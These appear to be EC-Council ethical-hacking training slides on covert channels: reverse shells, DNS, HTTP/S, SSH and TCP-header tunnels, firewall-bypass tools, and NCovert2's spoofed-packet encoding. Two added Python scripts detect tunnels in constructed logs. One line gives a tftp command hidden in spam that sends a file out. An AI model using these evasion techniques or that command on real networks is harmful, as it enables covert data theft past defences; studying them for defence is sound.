Ethical Hacking Version 5
Module 24
Covert Hacking
EC-Council
Insider Attacks
• Insider attacks are attacks initiated from inside-out
• Inside-out attacks try to initiate network connections from the trusted (corporate) network to the untrusted (Internet) network
• These techniques are used to evade firewall filters
[Figure: insider on the corporate network communicating with an outsider on the Internet]
What is a Covert Channel?
• A covert channel is a mechanism for sending and receiving data between machines without alerting any firewalls and IDSs on the network
• The technique derives its stealthy nature from the fact that it sends traffic through ports that most firewalls will permit
[Figure: attacker on the Internet reaching the internal network through the network firewall]
Security Breach
• A covert channel is a security breach because it involves a trusted insider who sends information to an unauthorized outsider in a covert fashion
• For example, an employee wants to let an outsider know whether his company won a big contract
• The two could come up with a scheme to communicate this information secretly
Why Do You Want to Use a Covert Channel?
• Transfer a file from a victim machine to a hacker machine
• Transfer a file from a hacker machine to a victim machine
• Launch applications on the victim machine
• Interactive remote control access from the hacker machine to the victim machine
• Bypass any corporate filtered firewall rules
• Bypass corporate proxy server content filters
Motivation of a Firewall Bypass?
• Surfing to filtered websites (e.g. www.certifiedhacker.com)
• Listening to Internet radio
• Chatting with Internet friends
• Administration of home webservers via SSH
• Uploading and downloading special files (EXE, ZIP) which are filtered by the corporate content filter policy
• Using peer-to-peer techniques
• Who wants to bypass the firewall policy?
  • Advanced users from the internal network
  • Disgruntled employees
  • Hackers
Covert Channels Scope
Covert Channel: Attack Techniques
1. Implementing hacker code within the optional fields of an Internet-allowed protocol
  • DNS tunnel, ICMP tunnel
2. Tunneling hacker payload within the request and response of an Internet-allowed protocol
  • HTTP tunnel, e-mail tunnel
3. Running other protocols on ports other than those normally assigned to them
  • For example, running IRC on port 80 (HTTP)
4. Misusing Internet-allowed protocols
  • Proxy CONNECT method
Simple Covert Attacks
• Simple covert attacks use direct channels to communicate with the Internet
• Direct channels
  • ACK tunnel
  • TCP tunnel (POP, Telnet, SSH)
  • UDP tunnel (syslog, SNMP)
  • ICMP tunnel
  • IPsec, PPTP
Simple Covert Attacks
[Figure: direct channel between the corporate network and the attacker, crossing the network firewall and the Internet]
Advanced Covert Attacks
• Advanced covert attacks use proxified channels to communicate with the Internet
• Proxified channels
  • SOCKS SSL tunnel
  • HTTP/S tunnel (payload of HTTP = tunnel)
  • HTTP/S proxy CONNECT method tunnel
  • DNS tunnel
  • FTP tunnel
  • Mail tunnel
Advanced Covert Attacks
[Figure: proxified channel from the corporate network through the LAN proxy and the DMZ proxy to the attacker on the Internet]
Standard Direct Connection
[Figure: the attacker connects directly to the victim server]
Reverse Shell (Reverse Telnet)
[Figure: the victim server connects back to the attacker]
Direct Attack Example
• Buffer overflow is an example of a direct attack
[Figure: a web server request from the hacker-controlled host is passed by the firewall into the internal network, and a reverse shell is established]
Indirect Attack Example
[Figure: a web server request from the hacker-controlled host is BLOCKED by the firewall (port blocked); instead an INSIDER initiates the connection from the internal network, and a reverse shell is established for remote control]
Reverse Connecting Agents
• Reverse connecting agents can be installed by:
  • E-mail (attachments, HTML social engineering)
  • Downloaded from the Web
  • CD-ROM autostart program
  • ZIP drives
  • USB stick
  • iPod drives
Covert Channel Attack Tools
• Netcat
• DNS tunnel
• SSH reverse tunnel
• HTTP/S tunnel
• HTTPS proxy CONNECT method tunnel
• ICMP tunnel
Netcat
• Netcat is the most popular tool for reverse shell exploits
• Widely used as the payload in buffer overflow exploits
DNS Tunneling
• The data is tunneled through DNS traffic
• How it works: the client does DNS lookups for a host in the delegated domain. If the server wants to connect, it responds with a 'key' IP address. The client then starts a shell in a pipe and feeds the output of the shell (in the form of DNS queries) to the server.
[Figure: DNS queries from the client pass through the firewall to the DNS tunnel server on the Internet]
Covert Channel Using DNS Tunneling
[Figure: the client repeatedly polls the server; the server answers with commands, which the client executes]
Tunnel commands shown in the figure:
1. POLL
2. GET FILE TO CLIENT
3. PUT FILE TO SERVER
4. EXECUTE @CLIENT
5. EXIT CLIENT
DNS Tunnel Client
• The DNS Tunnel Client is a tool that uses DNS queries to build a tunnel to the DNS Tunnel Server, which is located on the Internet
• When the tunnel is established successfully, you have the capability to remotely control your computer through the web site of the DNS Tunnel Server
DNS Tunneling Countermeasures
• Separate internal from external DNS
• Apply firewall rule: allow DNS from internal HTTP proxy servers only
• Apply firewall rule: deny all other DNS packets
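Detection logic for the DNS tunnel mechanism described above, as an added example that is not part of the EC-Council material: it scores a constructed resolver log for the traits a polling tunnel client leaves behind (one fresh subdomain per poll, long high-entropy labels carrying encoded data, TXT/NULL record types). The log lines, the client addresses and the tunnel.test zone are all constructed.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed DNS query log ("<time> <client> <qtype> <qname>"); tunnel.test is a made-up delegated zone.
SAMPLE_LOG = """\
10:00:01 10.1.2.3 A www.example.com
10:00:02 10.1.2.3 A mail.example.com
10:00:03 10.1.2.9 TXT 4a7f9c2e1b0d3f8a6e5c.t.tunnel.test
10:00:04 10.1.2.9 TXT 9e1d4b7a3c6f0e2d8b5a.t.tunnel.test
10:00:05 10.1.2.9 TXT 0c3e6b9d2f5a8c1e4b7d.t.tunnel.test
10:00:06 10.1.2.9 TXT 7b2e5d8a1c4f0e3b6d9a.t.tunnel.test
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def shannon_entropy(label: str) -> float:
    """Bits per character; encoded data chunks score far above real hostnames."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0


def registered_domain(qname: str) -> str:
    """Last two labels of the name (no public-suffix list; enough for the constructed sample)."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def score_domains(log_text: str, min_queries: int = 4) -> dict:
    """Map each suspicious zone to the signals that fired (the slide's mechanism: cache-busting
    unique subdomains per poll, long high-entropy labels, payload-bearing TXT/NULL record types)."""
    by_zone = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            by_zone[registered_domain(m.group(4))].append((m.group(3).upper(), m.group(4).lower()))
    flagged = {}
    for zone, queries in by_zone.items():
        if len(queries) < min_queries:
            continue
        names = {q for _, q in queries}
        labels = [q.split(".")[0] for q in names]
        reasons = []
        if len(names) / len(queries) > 0.8:
            reasons.append("unique_subdomains")
        if max(map(len, labels)) >= 20 and sum(map(shannon_entropy, labels)) / len(labels) > 3.0:
            reasons.append("high_entropy_labels")
        if sum(t in ("TXT", "NULL") for t, _ in queries) / len(queries) > 0.5:
            reasons.append("txt_null_heavy")
        if len(reasons) >= 2:
            flagged[zone] = reasons
    return flagged
```

A hit on two or more signals for one zone is what the "separate internal from external DNS" and "allow DNS from the proxy only" rules above are meant to make visible: once only the proxy may resolve externally, any other host generating such queries is itself the alert.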
Covert Channel Using SSH
• Assuming SSH is allowed by the firewall, establish an SSH connection from inside-out
• Use this connection to gain access to the internal systems
[Figure: SSH connection initiated from the internal network through the firewall to the attacker]
Covert Channel Using SSH (Advanced)
• Use SSL if a proxy server is used internally and content filtering is enabled
[Figure: SSH wrapped in SSL, passing through the internal proxy and the firewall to the attacker]
HTTP/S Tunneling Attack
• Establish an inside-out connection using HTTP POST requests (port 80 is usually allowed)
[Figure: the victim on the corporate LAN sends data through the HTTP/S proxy (content filtering enabled; http, https and ftp permitted) to a web server on the Internet]
1. Data is sent using HTTP + applets
2. SSH is established from the web server to the hacker machine
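Proxy-side detection for the two HTTP/S channels the deck covers (the POST-based tunnel above and the proxy CONNECT method tunnel), as an added example that is not EC-Council code: it reads a constructed proxy access log and flags CONNECT requests to ports other than 443, CONNECT sessions held open for hours, and clients that POST fixed-size bodies to one host on a fixed cadence. The log format, client addresses and tunnel.test hosts are constructed.

```python
import re
from collections import defaultdict
from statistics import pstdev

# Constructed proxy access log: "<epoch> <client> <method> <host>:<port> <status> <bytes> <ms>".
# tunnel.test is a made-up external host standing in for the attacker's server.
SAMPLE_LOG = """\
1700000000 10.1.2.3 GET www.example.com:80 200 5120 120
1700000005 10.1.2.9 CONNECT relay.tunnel.test:22 200 10240 3600000
1700000010 10.1.2.3 GET www.example.com:443 200 2048 95
1700000030 10.1.2.7 POST tun.tunnel.test:80 200 64 40
1700000060 10.1.2.7 POST tun.tunnel.test:80 200 64 38
1700000090 10.1.2.7 POST tun.tunnel.test:80 200 64 41
1700000120 10.1.2.7 POST tun.tunnel.test:80 200 64 39
"""
LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+):(\d+) (\d+) (\d+) (\d+)$")


def parse(log_text: str):
    """Yield one dict per well-formed log line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, method, host, port, status, nbytes, ms = m.groups()
            yield {"ts": int(ts), "client": client, "method": method, "host": host,
                   "port": int(port), "status": int(status), "bytes": int(nbytes), "ms": int(ms)}


def find_tunnels(log_text: str, max_connect_s: int = 1800, min_posts: int = 4) -> set:
    """Return {(client, host, reason)} for sessions that look like HTTP/S tunnels."""
    findings = set()
    posts = defaultdict(list)
    for r in parse(log_text):
        if r["method"] == "CONNECT":
            # CONNECT exists for HTTPS; any other port means the proxy is relaying a raw TCP stream.
            if r["port"] != 443:
                findings.add((r["client"], r["host"], "connect_to_non_https_port"))
            # A browser rarely holds one CONNECT open for hours; an interactive shell does.
            if r["ms"] >= max_connect_s * 1000:
                findings.add((r["client"], r["host"], "long_lived_connect"))
        elif r["method"] == "POST":
            posts[(r["client"], r["host"])].append(r)
    for (client, host), rs in posts.items():
        if len(rs) < min_posts:
            continue
        gaps = [b["ts"] - a["ts"] for a, b in zip(rs, rs[1:])]
        sizes = [r["bytes"] for r in rs]
        # Fixed cadence plus constant-size bodies is the signature of a polling tunnel client.
        if pstdev(gaps) < 2 and pstdev(sizes) < 1:
            findings.add((client, host, "periodic_fixed_size_posts"))
    return findings
```

Restricting CONNECT to port 443 at the proxy removes the first finding class outright; the other two remain heuristics that need the proxy to log duration and body size.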
Covert Channel Hacking Tool: Active Port Forwarder
• Active Port Forwarder is a software tool for secure port forwarding. It uses SSL to increase the security of communication between a server and a client
• This tool can be used to bypass firewalls
Covert Channel Hacking Tool: CCTT
• CCTT (Covert Channel Tunneling Tool) enables the creation of communication channels through NACS to create data streams which can:
  • Establish an external server shell from within the internal network
  • Establish a shell from a box located within the internal network to an external server
  • Establish a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (SSH, SMTP, POP, etc.) between an external server and a box within the internal network
Covert Channel Hacking Tool: Firepass
• Firepass is a tunneling tool that bypasses firewall restrictions by encapsulating data flows inside legitimate HTTP POST requests
• TCP- or UDP-based protocols may be tunneled with Firepass
Covert Channel Hacking Tool: MsnShell
• MsnShell is a covert channel tunneling tool that allows you to remotely control a Linux computer protected by a firewall
• MsnShell encapsulates shell commands and responses within the MSN protocol
  • Establishes a shell from a box located within the internal network to an external server
  • Encapsulates shell commands and responses within the MSN protocol (SHELL over MSN)
  • Supports HTTP proxy (SHELL over MSN over HTTP)
Covert Channel Hacking Tool: Web Shell
• "Web Shell" is a remote UNIX/Windows shell that tunnels packets via HTTP/HTTPS
• The client component provides a shell-like prompt, encapsulating user commands into HTTP POST requests and sending them to the server-part script on the target web server, directly or via an HTTP proxy server
• The server part extracts and executes commands from the HTTP POST requests and returns STDOUT and STDERR output as HTTP response messages
  • SSL support
  • Command line history support
  • File upload/download
Covert Channel Hacking Tool: NCovert
• NCovert is an open-source program designed to function as a TCP covert channel
• It is a file transfer system that uses the TCP protocol to covertly move data from one system to another
• NCovert uses spoofing techniques to hide the source of communications and the data that travels over the network
• The technique essentially creates a covert channel for communications by hiding four characters of data in the TCP header's initial sequence number (ISN) field
Ncovert - How it works
• The sender sends a SYN packet with data in the ISN to a public server, forging the source IP as the receiver's IP
• The public server receives the SYN and sends a SYN/ACK to the receiver's machine
• The receiver's machine sniffs the packet and extracts the data; its OS sends a RST to the public server
• This process is repeated until all data is sent
Ncovert2 - How it works - Part 1
1. Sender and receiver agree on a shared secret, which is hashed with SHA-1
2. Sender generates a random session key and creates the IP ID and source port from the SHA-1 hash and the session key
3. Sender XORs the file size and the session key to create the ISN
4. The first packet is sent to port 80 with the session key in the IP ID and source port, and the file size in the ISN
5. Receiver sniffs for a packet to its destination address with destination port 80
6. Receiver extracts the session key from the IP ID and source port using the SHA-1 hash
7. Receiver extracts the file size from the ISN using the session key
8. Sender and receiver generate a session hash from the session key and the SHA-1 password hash for creating predictable source ports
Ncovert2 - How it works - Part 2
9. Sender XORs data with the previous ISN and the session hash to create the new ISN, creates a packet with a random IP ID, the "predictable" source port, and the new ISN, and sends the packet
10. Sender also sends decoy packets
11. Destination ports on legitimate and decoy packets randomly use 1-65535, repeating as needed
12. Receiver sniffs packets, ignores packets without "predictable" destination ports, and uses the previous ISN and the session hash to extract the data
13. Packets are sent until all data is transmitted
14. The source address is only required on the first packet, so source addresses can be changed to something "random", including on decoy packets
15. The transmission should look like a TCP ping to port 80 followed by a full port scan, with random source addresses
Covert Channel Hacking via Spam E-mail Messages
• Covert channel communication via spam messages is difficult to detect because of the means of delivery
• By using keyword- or phrase-based communication with the back door system, the e-mail appears to be ordinary spam
• This text can be varied by attacker specification
• This makes detection via standard intrusion detection methods virtually impossible
• The client and server components can exchange information by simply sending spam e-mail messages
Covert Channel Hacking via Spam E-mail Messages
• Hidden embedded command inside the spam e-mail:
  tftp -I 10.0.0.6 c:\conf\abc.dat send.dat
Hydan
• Hydan steganographically conceals a message inside an application without altering the file size
• It exploits redundancy in the i386 instruction set by defining sets of functionally equivalent instructions. It then encodes information in machine code by choosing the appropriate instruction from each set
• This tool can be used for covert communication
• http://crazyboy.com/hydan